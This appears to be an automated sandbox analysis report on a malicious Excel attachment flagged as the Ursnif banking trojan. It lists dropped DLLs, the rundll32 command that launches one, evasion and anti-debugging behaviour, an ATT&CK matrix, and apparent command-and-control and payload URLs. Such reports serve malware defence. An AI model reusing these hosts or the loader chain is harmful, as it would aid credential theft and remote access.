Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://tasks.office.com
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://wus2-000.contentsync.
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://wus2-000.pagecontentsync.
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728

Source: unknown

HTTPS traffic detected: 192.185.16.102:443 -> 192.168.2.6:49728 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000002.646959621.000000000530B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4536, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000002.646959621.000000000530B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4536, type: MEMORY

System Summary:

Office process drops PE file

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\ProgramData\ddg\11.dll			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\2200[1].dll			Jump to dropped file

Writes registry values via WMI

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC41AD1 NtMapViewOfSection,	2_2_6FC41AD1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC41C22 GetProcAddress,NtCreateSection,memset,	2_2_6FC41C22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC423C5 NtQueryVirtualMemory,	2_2_6FC423C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00A17925 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	2_2_00A17925
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00A1B169 NtQueryVirtualMemory,	2_2_00A1B169

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC421A4	2_2_6FC421A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00A140B3	2_2_00A140B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00A1AF44	2_2_00A1AF44
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC68FAA	2_2_6FC68FAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC6AF74	2_2_6FC6AF74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC65A1A	2_2_6FC65A1A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC72D21	2_2_6FC72D21
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC70C89	2_2_6FC70C89
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC724BC	2_2_6FC724BC

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSB@6/10@4/3

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_00A1229C CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

2_2_00A1229C

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{8D47CC7A-5DAB-4020-89AB-89D27B6C21E5} - OProcSessId.dat

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServer

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServer
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\ddg\11.dll,DllRegisterServer	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Attached_File_898318.xlsb	Initial sample: OLE zip file path = docProps/thumbnail.wmf
Source: Attached_File_898318.xlsb	Initial sample: OLE zip file path = xl/media/image1.png
Source: Attached_File_898318.xlsb	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source:

Binary string: c:\OldMust\LevelChange\againstlaw\each.pdb source: 2200[1].dll.0.dr

Data Obfuscation:

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC42140 push ecx; ret	2_2_6FC42149
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC42193 push ecx; ret	2_2_6FC421A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00A1E6BE push esp; retf	2_2_00A1E6BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00A1AC00 push ecx; ret	2_2_00A1AC09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00A1E1AF push ebx; ret	2_2_00A1E1B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00A1AF33 push ecx; ret	2_2_00A1AF43
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00A1E163 push edx; iretd	2_2_00A1E164
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC50B9B push ecx; iretd	2_2_6FC50BD9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC54B10 push ebx; retf	2_2_6FC54B4B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC54B38 push ebx; retf	2_2_6FC54B4B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC692D5 push ecx; ret	2_2_6FC692E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC54E84 push 8D039560h; retf	2_2_6FC54EBE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC56A7E push ebx; ret	2_2_6FC56A9A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC56A03 push eax; ret	2_2_6FC56A06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC56197 push esp; iretd	2_2_6FC5619E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC569A7 push edi; ret	2_2_6FC569B4

Persistence and Installation Behavior:

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\ProgramData\ddg\11.dll			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\2200[1].dll			Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\ProgramData\ddg\11.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000002.646959621.000000000530B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4536, type: MEMORY

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\2200[1].dll

Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_2-13193

Source: C:\Windows\SysWOW64\rundll32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_2-11935

Source: C:\Windows\SysWOW64\rundll32.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

2_2_00A17DD8

Source: C:\Windows\SysWOW64\rundll32.exe

API call chain: ExitProcess graph end node

graph_2-13195

Anti Debugging:

Found API chain indicative of debugger detection

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep

graph_2-12784

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_6FC6DF2F _memset,IsDebuggerPresent,

2_2_6FC6DF2F

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_6FC6E881 ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,

2_2_6FC6E881

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC88303 mov eax, dword ptr fs:[00000030h]	2_2_6FC88303
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC87E40 push dword ptr fs:[00000030h]	2_2_6FC87E40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6FC88239 mov eax, dword ptr fs:[00000030h]	2_2_6FC88239

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_6FC6950C GetProcessHeap,

2_2_6FC6950C

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_6FC6DC66 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

2_2_6FC6DC66

HIPS / PFW / Operating System Protection Evasion:

Source: rundll32.exe, 00000002.00000002.645458991.00000000033C0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000002.00000002.645458991.00000000033C0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 00000002.00000002.645458991.00000000033C0000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: rundll32.exe, 00000002.00000002.645458991.00000000033C0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_00A18B98 cpuid

2_2_00A18B98

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,

2_2_6FC41B13

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_6FC41000 GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

2_2_6FC41000

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_00A18B98 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

2_2_00A18B98

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_6FC4166F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

2_2_6FC4166F

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000002.646959621.000000000530B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4536, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000002.646959621.000000000530B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4536, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	Path Interception	Process Injection2	Masquerading1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API2	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion1	LSASS Memory	Security Software Discovery13	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution4	Logon Script (Windows)	Logon Script (Windows)	Process Injection2	Security Account Manager	Virtualization/Sandbox Evasion1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol4	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Rundll321	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery34	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Attached_File_898318.xlsb	0%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
urbandancecity.com	0%	Virustotal		Browse
api10.laptok.at	11%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://wus2-000.contentsync.	0%	URL Reputation	safe
https://wus2-000.contentsync.	0%	URL Reputation	safe
https://wus2-000.contentsync.	0%	URL Reputation	safe
https://wus2-000.contentsync.	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://ofcrecsvcapi-int.azurewebsites.net/	0%	Virustotal		Browse
https://ofcrecsvcapi-int.azurewebsites.net/	0%	Avira URL Cloud	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	Virustotal		Browse
https://officeci.azurewebsites.net/api/	0%	Avira URL Cloud	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
http://139.162.190.91/campo/a/a.D	0%	Avira URL Cloud	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
http://majorleave.net	0%	Avira URL Cloud	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
http://api10.laptok.at/api1/_2B3EC16o/ZAwFGYF9Vidd2jOtlAgm/mFihH4UJ9WRC5w2li3g/OmibLsmZh5kJggmEaLzXRw/GA804i0H_2FW_/2Bkfn2No/zd0HyzP1MHF3zy0EvBK150W/_2B_2F72Dj/XoTXOXEzn6drW_2F_/2Bb7rN2KKcCZ/KiFeG39_2BW/irWAdzICnBHe9A/JQjcMLSav9jkNFGwHtKAG/2eL5LYIsSV49BFxc/6fK4w6t6KL1u4HS/P5vv5cRA4KCaKMNSZL/6ARUH9_2F/EAxxwtglWrZsl5pAsfsN/hmQH9PGx0xVYwlQOUAn/SkTHJd4lg4vDyhmkAnMXCm/mjKfMaxW9/ggDtMvzus/3j	0%	Avira URL Cloud	safe
http://api10.laptok.at/api1/quWyI8WCkgN/SXUvWGfiUm7T0f/lzSlHf7sO503xATuzHkPG/Uh6KISBL5d4ngtXF/8CCWBl9aRux0ggg/WjpeRnlHlxQpgYHWF7/SRgr07KRV/r5lQqK3B6jZkHZiIL4cT/yujdqTpvuL8V1NlvglB/sTzNC3Gtg_2Bwr4uzl4_2F/AC089ktgtaMkN/4Kgt2RLr/Ke14XkQchJOlvOHrYVkVyXU/P0CMvsMir5/NwrpznNArerCa8bkI/55ua2Ge0fpbQ/9kzo82khbwL/WEPiqQPRb97B8a/81xN3oY2Fv8ECPICx_2Be/nWcE6nEvng8OxAW2/XsEKKCKa1AcTuvo/k	0%	Avira URL Cloud	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://asgsmsproxyapi.azurewebsites.net/	0%	Avira URL Cloud	safe
